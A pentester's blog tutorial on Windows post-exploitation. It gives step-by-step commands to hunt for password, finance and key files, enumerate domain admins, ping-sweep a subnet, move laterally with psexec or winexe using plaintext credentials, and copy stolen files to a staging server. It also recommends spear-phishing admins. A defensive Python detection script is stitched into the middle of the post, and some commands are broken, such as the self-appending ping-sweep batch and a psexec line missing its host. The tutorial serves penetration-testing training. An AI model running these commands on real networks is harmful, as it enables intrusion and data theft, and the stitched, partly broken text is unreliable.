Using APT tactics and techniques in your pentests

I have a student that has been asking me about internal network penetration testing so I figured I'd write a blog post about it. I was trying to explain to him that there is so much more to it than just popping boxes. Breaking into a machine is easy; moving around a network and stealing data without getting caught is the real skill. Basically, you want to use the Tactics, Techniques, and Procedures (TTPs) used by Advanced Persistent Threats (APTs).

When I do network penetration tests I explain to the customer that there are 4 levels of post exploitation and they need to choose what level they want me to use based on the goals of the test.

  • Level 1: Access - proving that you can gain access to hosts.
  • Level 2: Leveraged Access - proving that you can jump from initially compromised hosts to other hosts in the network.
  • Level 3: Data Driven Access - going after the target organization's intellectual property, trade secrets or financials.
  • Level 4: Long term command and control (C2) - staying persistent in the environment for a prolonged period of time and exfiltrating data out of the network.

In this blog post I'll try to cover a few of the things we pentesters do on internal pentests to data mine the network.


Data Mining The Host

Ok, so you just broke into a machine with a browser, PDF, or Java exploit. You are sitting at your meterpreter prompt. You can run a few meterpreter scripts like 'winenum.rb', 'enum_domain_user', 'file_collector.rb', 'int_doc_find.rb' or similar scripts, but I'm going to try to walk you through doing this stuff without meterpreter scripts so you can better understand what those scripts are doing or write your own.


Let's start by turning our meterpreter shell into a regular shell.

meterpreter> execute -c -H -f cmd -a "/k" -i


Let's figure out which updates are installed on this computer. On Windows 7/8 you can use DISM or WMIC (note: DISM will return far more details than WMIC):

c:\> DISM /Online /Get-Packages

c:\> WMIC QFE List



OK, now that we have a regular command prompt let's search the drive and sort the files by time accessed. We can use this to find important files by typing:

c:\> dir C:\ /S /OD /TA


If you actually know the date that a particular file was created you can search the drive and sort the files by time created by typing:

c:\> dir C:\ /S /OD /TC


You can do something similar by searching for files based on the modification date. You can search the drive and sort the files by time written by typing:

c:\> dir C:\ /S /OD /TW



A trick that I use a lot is to search the drive for files with business critical words in the file names by typing the following:

c:\> dir c:\*bank* /s

c:\> dir c:\*password* /s

c:\> dir c:\*pass* /s

c:\> dir c:\*competitor* /s

c:\> dir c:\*finance* /s



These are goodies for financial and risk-related data.

c:\> dir c:\*invoice* /s

c:\> dir c:\*risk* /s

c:\> dir c:\*assessment* /s


These are good when you are looking for specific file types (.key or .pem files for encryption keys and certificates, .vsd files for Visio network diagrams, .pcf files for VPN configuration files, .ica files for Citrix, and log files).

c:\> dir c:\*.key* /s

c:\> dir c:\*.vsd /s

c:\> dir c:\*.pcf /s

c:\> dir c:\*.ica /s

c:\> dir c:\*.crt /s

c:\> dir c:\*.log /s


I look really hard for .pcf and .ica files. Anything that can give me legitimate access to the network. There is no better backdoor than legitimate access.

Now I did have a pentest where the customer had named the password file GeorgeBush.xlsx - (yes, every network has a password text file or spreadsheet). Evidently a penetration tester before me had found the password file when it was called passwords.xlsx so they renamed the file. So to search the drive for files with critical data in them instead of just searching by name you can type:

c:\> type c:\sysprep.inf

c:\> type c:\sysprep\sysprep.xml

c:\> findstr /I /N /S /P /C:password *

c:\> findstr /I /N /S /P /C:secret *

c:\> findstr /I /N /S /P /C:confidential *

c:\> findstr /I /N /S /P /C:account *

c:\> findstr /I /N /S /P /C:payroll *

c:\> findstr /I /N /S /P /C:credit *

c:\> findstr /I /N /S /P /C:record *



Active Directory Enumeration

Ok, so you've pilfered the host you compromised and now it's time to spread your wings and look for new prey in the network. Let's move on to Active Directory enumeration and I'll just have to write another blog post on lateral movement later.


I like to use the net view command to look for other hosts in the network.

c:\> net view



We can run net view /domain to get a list of the domains and workgroups in the target environment.

c:\> net view /domain



Let's look for local users (always check this - every once in a while you'll run into a network that uses local accounts for stuff). Sometimes system administrators do make use of local users and groups to do system administration tasks as a means of restricting access to the domain. This can be good if done very carefully, and it could be really bad as it often forces the admin to do administrative tasks with the same local admin password throughout the entire environment.

c:\> net user


Now let's grab a list of users in the domain.

c:\> net user /domain


For the same reason we checked for local users, we need to be sure to check for local groups as well.

c:\> net localgroup

c:\> net localgroup /domain

c:\> net localgroup administrators



Now, it's time to get serious. The next few commands are where I get the really good info.

c:\> net localgroup administrators /domain


Finding out the users in the domain is always handy, but nothing like the next command.

c:\> net group "Domain Users" /domain


Now here is where you make your money. I like to look for users in the Domain Admins group. After compromising my first host - once I find a user in the Domain Admins group - I spear phish them. That's usually the fastest way to domain admin level access for me.

c:\> net group "Domain Admins" /domain




net user "jima" /domain
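
For defenders, the keyword searches and `net` enumeration above leave a recognisable trail in process-creation logs. The following is an added example, not part of the original post: it assumes Windows process-creation events with command lines (Security event 4688 with command-line auditing, or Sysmon event 1) have been exported as (timestamp, host, user, command line) tuples, and the rule names, window, threshold and sample records are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Rules keyed to the command lines shown in this post. net.exe often hands off
# to net1.exe, so both are matched. dir and type are cmd.exe built-ins: they
# create no process, so they never appear in process-creation logs.
RULES = [
    ("domain_group_enum", re.compile(r'\bnet1?(\.exe)?\s+(group|localgroup)\b.*/domain', re.I)),
    ("domain_user_enum", re.compile(r'\bnet1?(\.exe)?\s+user\b.*/domain', re.I)),
    ("host_enum", re.compile(r'\bnet1?(\.exe)?\s+view\b', re.I)),
    ("keyword_grep", re.compile(r'\bfindstr(\.exe)?\b(?=.*\s/s\b)'
        r'(?=.*/c:"?(password|secret|confidential|account|payroll|credit|record))', re.I)),
    ("patch_enum", re.compile(r'\b(wmic(\.exe)?\s+qfe|dism(\.exe)?\s+/online\s+/get-packages)', re.I)),
]

def classify(cmdline):
    """Return the name of the first rule matching a command line, else None."""
    return next((name for name, rx in RULES if rx.search(cmdline)), None)

def detect(events, window=timedelta(minutes=10), threshold=3):
    """Alert on a (host, user) hitting >= threshold distinct rules inside window."""
    hits = defaultdict(list)
    for ts, host, user, cmd in events:
        rule = classify(cmd)
        if rule:
            hits[(host, user)].append((datetime.fromisoformat(ts), rule))
    alerts = []
    for (host, user), seq in hits.items():
        seq.sort()
        for i, (start, _) in enumerate(seq):
            rules = {r for t, r in seq[i:] if t - start <= window}
            if len(rules) >= threshold:
                alerts.append((host, user, start.isoformat(), sorted(rules)))
                break
    return alerts

# Constructed sample records: (timestamp, host, user, command line).
SAMPLE = [
    ("2024-01-15T09:00:05", "WS-042", "CORP\\alice", "net view /domain"),
    ("2024-01-15T09:00:40", "WS-042", "CORP\\alice", 'net group "Domain Admins" /domain'),
    ("2024-01-15T09:01:10", "WS-042", "CORP\\alice", "C:\\Windows\\system32\\net1 user jima /domain"),
    ("2024-01-15T09:03:00", "WS-042", "CORP\\alice", "findstr /I /N /S /P /C:password *"),
    ("2024-01-15T09:05:00", "WS-017", "CORP\\itadmin", "net user /domain"),
    ("2024-01-15T13:30:00", "WS-017", "CORP\\itadmin", "WMIC QFE List"),
]
print(detect(SAMPLE))
```

A single lookup such as the lone `net user /domain` on WS-017 stays below the threshold; it is the burst of distinct discovery commands from one user on one host that raises the alert.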




OK, now let's start moving around the network. No Nmap - no problem. If you have time (because this is REALLY slow), you can ping sweep the network via a batch file.


more pingsweep.bat

echo @echo off > pingsweep.bat

echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat



Ok - now all you have to do is just type 'pingsweep' and then the first 3 octets of the target subnet.


pingsweep 10.10.30



Now if you need to generate a list of IP addresses you can use this quick for loop.

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt

more ips.txt


Now let's echo some domain user names into a text file.

echo heat >> names.txt

echo jima >> names.txt

echo roge >> names.txt

echo patr >> names.txt

echo jami >> names.txt

echo bonn >> names.txt

echo rhon >> names.txt

echo sall >> names.txt

echo joyj >> names.txt

echo laur >> names.txt

echo sloa >> names.txt

echo Administrator >> names.txt


more names.txt



Now we can use a for loop to look for logged in users

for /f "tokens=1" %a in ('net view ^| find "\\"') do @echo %a >> hosts.txt



Now once you have found machines with logged-in users that you have passwords or hashes for, you can PSExec to those machines. I know I didn't cover password stealing and hashdumping - I'll do it in another blog post if you guys want me to.


PSExec in Windows

c:\psexec.exe /accepteula \\ -u administrator -p [email protected]! cmd.exe



PSExec in Linux
Just for the sake of making sure that you have this syntax - here is how to do PSExec in Linux. I prefer to use a tool called winexe. I have it on my Amazon S3 if you want to download it from me.

cd ~/toolz


chmod 777 winexe

./winexe -U [email protected]! //WIN7-X64-1 cmd.exe





Here is how I figure out how many users are logged on/connected to a server?





Now you just move with psexec to the next machine and do the host data mining all over again (shampoo, lather, rinse, repeat). You do all of the dir commands again, and you do all of the findstr commands again. Grab all of the important files, then map a drive to what you want to become your staging server. Copy all of the important files to that staging server. Here is how to map a network drive.


net use O: \\\c$  /u:administrator [email protected]!

net use /d O:



Whew, this was a long blog post. We covered a lot today, but there is a lot we didn't cover. We didn't cover password stealing, hashdump, pass the hash, or data exfiltration.


Let’s call it quits right there, and I’ll come back in a day or so and give you something else to chew on.



CEO/Founder at Strategic Security "I love helping people, I love my family, I love basketball, I love teaching, and you all know that I love rum and coke."  

2 Responses

  1. YOU
    thanks joe
  2. Hi Joe, Thanks for this blog. This is an excellent resource for improving on skills. Awaiting other articles of this series. Please do include all possible techniques for network penetration testing in further blog posts.
